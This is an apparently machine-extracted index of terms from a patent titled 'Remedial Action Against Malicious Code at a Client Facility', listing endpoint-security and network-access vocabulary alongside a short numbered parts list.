modems

storage device

improved tracking and detection

network connections

mobile users

home appliance controller

gateways

infrared

track ball

persistent threats

flash memory

reference

client facility connections

threat management environment

mass storage

management update modules

Erasable PROM

policy violations

data

non-compliant computers

near field communications interface

wireless device

user

USB port

file servers

input/output interface

other devices

other solid-state device

secondary location

passive state

bus

appliance 140B

hypervisor

uncontrolled access

level

appliances

secondary location threat network

part

configuration and policy changes

process data

instance

security-related or policy-related downloads

telecommunications networks

locally-deployed protective measures

potential threat

laptop computer

router

scanning data

client facility

network data

improved performance

functions

bluetooth

certain actions

preparedness

comparison

faster access

fourth generation cellular technology

hardware and software

e-mail client facility

unknown malicious code

potentially harmful activity

computing facilities

other communication mechanism

two interfaces

sandbox

fiber optics

limitation

code

one or more instances

other technologies

disk drive

expanded input/output ports

management systems

one or more reliability index thresholds

desktop computer

storage

outgoing files

spread

endpoint computer security facility

computer’s

other computing

network boundaries

locally-installed endpoint computer security facility

similar threat protection

television

wearable computer

viruses

exemplary threat management system

application program(s)

foot pedal

suitable device

computing resources

one or more networks

radio frequency (RF) transceiver

hardware/software

system

non-volatile form

appliance 140A

outgoing file

local resources

monitoring activity

program instructions

service provider’s

communicating relationship

malware

facilities

remote location

application programming interface

non-volatile storage

other pair

various flow charts

policy and access requests

file

various implementations

fashion

process-specific basis

one or more policies

evaluation

peripherals

color

determination

client labeled

trojans

heartbeat system

other malicious activity

single memory

serial ports

other network or combination

greater reliability

steps set

exemplary computer system

intermediate source

web browser client facility

virtualized device

program modules

computer-readable medium

WiFi accessory

controls

database servers

security facility

radio-frequency identification

virtual private networks

given client facility

parallel processors

security configurations

product

ability

key management system

client facility computing platform

spam

out-of-enterprise facility mobile client facility

Public Switched Telephone Network

haptic devices

endpoint computer security facilities

MT-Advanced

rules or policies

threats and violations

networking components

distribution

other compromise

rules

data leakage

threat or policy violation

client device

malicious software

other sensor

update facility

software

network communications

general

plurality

access permissions

malicious code scan

certain applications and files

infrared interface

ports

reported information

configuration policies

optical communications

place

server facility

network interface

malware attack

certain data or instructions

combinations

cooperation

input/output devices

Random-Access Memory

mail servers

handheld or mobile devices

application

network traffic

remedial action facility

recording facility

processes and communicates

unacceptable network resource database

headset

operating system(s)

IoT devices

policy rules

cloud computing facility

mobile client facilities

threat

subsequent retrieval and use

tablet

its components

subscription

digital signal processing system

client facilities

cellular data

change

files or applications

files

definition file

augmented-reality displays

fax servers

plaintext

reliability index value

IoT device

IEEE 802.16m

internal memory store

external networks

various threats

particular manner

client

custom controls

components

WiMax connection

user’s

other local devices

third memory

data transfers

device resources

one or more devices

location or status

rate

detection techniques

data evaluation endpoint computer system

improved threat detection and response

hardware or software

computing device

bulk storage

microphone

magnetic card readers

constitutes processor firmware

simple appliances

physical proximity threats

communication ports

test file

other audiovisual device

computer code

one or more computing devices

network access

their source

flash card

caching

controlled access

multi-threaded processor

standalone device

local software application

resource requests

network endpoints

evolving threat environment

electronics

modem

more fine-grained and immediate control

computing devices

device hosting

private network

thermostat

presence

appropriate

component audio/video inputs

lesser reliability

further the status

other data reading

email security and control

different stages and types

contemplated herein

networked computer-based infrastructure

CDMA

automatic actions

web security and control

border

locations and network configurations

system components

wired or wireless transmission

threat management appliance

physical boundary

third party

warning

entity or device

threat or violation

application or device

other recognition engine

type

enterprise

radio frequency communications

joystick

physical connection

rule-based filtering

read

ultrasonic communications

local network

intrusion

other resource or device

other remote resource

more than one geographical locations

useful schedule

management

access rights

memory capacity

specific instance

keyboard

user-specific basis

instructions

unprotected network connection

network request

baseline RF characteristics

additional drives

platforms

short range

subsequent evaluation

busses

RFID

locations

USB device

human input/output

writing resource

dynamic labels

network endpoint or endpoints

file or application

ongoing process

metropolitan area

scanner

executables, processes, network communications

such labels

firewall

parsed information

higher speed

corporate area

physical connections

video driver

wireless facilities

result

particular IoT device

acceptable network resource database

other input/output system

various objects

ethernet ports

threat management system

white list

mobile client facility

one aspect

destination

malicious code information

endpoint threat protection facility

network devices

network access rules facility

integrated system approach

third-party product

number

other computer-readable medium

figure

output

context

entities

personal digital assistant

systems

other device

device or combination

record interactions

WiMax

mechanics

such mobile wireless facilities

combination

interaction

block diagram

recitation

interface

external device

like, or combinations

foregoing, and/or code

other accessory

other network action

laptops

firewalls

computer system

command or command file

watch

display

policy database

other hardware

testing

remedial measures

device or application

such instances

control

access

variations or combinations

other program modules

determinations

suitable context

periodic basis

device(s)

mobile enterprise facility clients

timely updates

acceptability

infrastructure

gateway facility

licensed applications

mobile phone

limitation one or more

print servers

desktop computer workstation

registers

vice-versa

other facilities

mail storage servers

processes

particular RF characteristics

or computer system

processor

computer-generated and human-generated threats

web servers

other external input/output devices

IEEE 802.11 standard

instructions and data

policy abuse

client or client facilities

turn

computer-based malware

corporation

local protection

audio jacks

on-board memory

potential sources

jewelry

safe zone

process

reliability index determination

server or servers

certain network users

first memory

content

action

parse network access requests

public networks

endpoint

streaming file management

variation

other security measures

specific services

unwanted applications

telephone ports

threat management facility

other device or combination

element number

organization

WiMax-Advanced

businesses

term endpoint

status

other resources

protection

updates

reliability index thresholds

other data

hardware

interconnection services

other software objects

various techniques

computer

actions

virtualization environment

host intrusion prevention

security compromise

variety

clothing

labeling

participants

network storage device or resource

network devices, users

embedded endpoint computer security facility

one or more sequences

implementations

database management system

requested network resource

wireless network access point

infrared transceiver

optical ports

client devices

definition files information

platform

network card

endpoints

operation

environment

suitable interactions

network location or resource

default values

extra memory

facility

PROM

reputation-based filtering

baseline value

mobile endpoint computer

local firewall

private networks

software and hardware

server facilities

homeowner

one or more input/output devices

printer

other network

computers

baseline values

threat attacks

web browsing activity

networks

tools

non-volatile computer

access point or firewall

network interactions

certain aspects

one or more device resources

needs

interrupted heartbeat

operating system

concert

like

spyware

elements

data and control information

example

match

software components

projector

web server facility

equivalent services

other networks

foregoing system components

coloring information

threat-protected environment

program data

processing instructions

flash drive

program

stored files

assets

cellular network connection

upgrades

data network(s) or internetwork(s)

threat management

performs

flow

same interactions

adware

policy management

communications resources

internet

managed actions

multiple entities

certain types

school

cellular networks

access rules

co-processor

threat protection

residents

data network

access requests

virtualized environment

applications, devices, users

Programmable Read-only Memory

system health

WiFi

vendor

enterprise facility

productivity and network performance

speaker

global positioning system

mobile client facility extensions

further files

individuals

personal firewall

hardware firewall

particular process

different aspects

protocols

appliance facility

reactive measures

security management facility

examples

network access control

three-dimensional rendering systems

game servers

home device

compute instance

routers

like containing content

DVD drive

system level

updated rules

files and code

current RF characteristics

other suitable protocol or combination

definition files

short range communications

corresponding policy

association

administrative server

capability

client facility files

gateway

unknown threats

connections

communications

question

other entity

wireless link

other devices or components

other algorithmic descriptions

one or more physical proximity threats

keys

medium

various components

performance

application programs

other network devices

application server facility

configuration

other virtualization management facility

networked applications

other computing facilities

meeting

campus

network access port

applications and files

firewall or gateway

threat management resources

proxy servers

one or more reliability index values

corresponding computer platform or computer support component

separate, main memory

established policy

network threats

Remedial Action Against Malicious Code at a Client Facility


Drawings

Brief Description:

illustrates an item 100 (deleted) in accordance with one embodiment.

Detailed Description:

Parts List

102

client facility

104

gateway facility

106

network

108

security facility

110

network control facility

112

application

114

116

database

118

policy facility

120

remedial action facility

122

network access control

124

network access rules

126

server

128

laptop computer

130

smart device


Terms/Definitions

IDE files

reported information

supplemental file

threat notice

block list

commands, definitions, or instructions

associated malicious code files

plurality

established rules

network resources

rules or policies

network access locations

desktop computer

user type

gateway facility

known malicious code

computing device

test file

particular enterprise

firmware

intranet

communication

combination

most recent malicious code definitions

applications and files

same network location

second embodiment

update

all the rules

resides

streaming file

certain types

block

one network

actions

protection

level

preparedness

client computer facility

planned update

network

same network

new IDE file

desired network location

action upon

rules

web browser

user request

successful network access request

interpretation

network control facility

user network access request

recording facility

at least one command

demand basis

updated rules

remedial action request architecture

data file and command file

data file

policy facility

malicious file

rules provider

computer facility

IDE management facility

network computing device

allowed list

command

other activities

external network

control

malicious application

access databases

received malicious code alert

network site reputation database

remedial action facility

generic rule

black list

set time period

streaming file or portions

update facility

attempt

network access port

denied network access

other client computing facilities

acceptable network site database

at least one instruction

organization hierarchy

tablet computer

security management facility

database

testing facility

file information

network access capability

result

type

IDE management

hardware

unacceptable network site database

network access rules management facility

generic set

legitimate application

virus identities

requested network site

instant messenger access

streaming files

network access device

action

malicious code

ability

blocks

overall security

gateway

certain applications and files

malicious applications

denied network location

streaming file management

access rights

at least part

parsed instructions

list

parsed data

commands

policy database

access rules

example

outgoing files

stored streaming file

additional actions

requested access

periodic basis

new updates

network access requests

white list

direct control

application access request

capability

IDE information

network access rules

known malicious code information

testing information

malicious code scan

computing facility

number

security configurations

at least one protocol

network access

able discover malicious code

rapid updating

updating

location

network locations

computer facilities

malicious code infected

corrective action

instructions

enterprise wide access rules

management

fixed periodic basis

enterprise rules

management facility

access request denial

external networks

address information

network accesses

test management facility

subset

rule evaluation

received information

application

requested network location

rules data base

reaction

external computing facilities

text file

client computing facilities

allow list

policy

website

user

laptop computer

enterprise’s

data

internet

access request

resident network

sporting website

only the personnel

adequate protection

document application or document file

individual client computing facility

transmitted

updates

peer-to-peer access request

scanning files or applications

outgoing file

other network locations

distribution system

additional attempts

connectivity

new malicious code

existing IDE file

reporting facility

files

Peer-to-Peer network

automatic and manual methods

network location

checking streaming files

malicious application network access

IDE file

security management

wireless network

other computer facilities

various aspects

access rights and permissions

remedial actions

system administrator’s

distribution

incoming files

test files

entire enterprise

other rule evaluation method

network access rules management

blocked access

demand

malicious code descriptions

request

regular expression rule evaluation, virus description language

predefined rule sets

defense

rule

software, hardware

continual updating

IDE provider

access control

steps

protocol

software file

access

auto-requested network request

application capabilities

computer facility type

network access request

wired network

first command

external client computing facilities

requested website

FTP access

databases

only support personnel

bandwidth

threats

malicious application information

denied network access request

parsed information

isolation

requested network site interaction

altered malicious code

additional malicious code

continual defense

other security measures

outcome

IDE definitions

determination

policy management facility

command file

alert

more than one command

information file

firmware application

network administrator

other client computing facilities and networks

smart phone computing device

external computer devices

second network location

sporting websites

quarantine

support

second level

network access control

databases and access rules

client facility

applications

similar manner

deny access rules

enterprise

network access policies

websites

identified application

incoming file

information

definitions

contents

certain actions

alert basis

networks

different network locations

predefined rules

external computing facility

known or potential malicious code

search

source

embodiment

possibility

timely updates

data or commands

malicious code information

departments

file

facilities

more than one level

software application

customers

virus identity file

first embodiment

various actions

computing facilities

internal client computing facility

other networks

smart device

command or command file

security facility

sending

denied network application request

indication

handheld computer

rules evaluation

IM activity

application type

defined access rules

source application

client computing facility

known malicious code file

network access permissions

server

acceptability

policies

work

facility

different access location

second command

information store

executing applications

associated client facilities

rules evaluation request

embodiments

testing

malicious application protection

denied access

provider

scanning

system administrator

databases and text files

remedial action architecture

latest malicious code

client computer facilities

file or application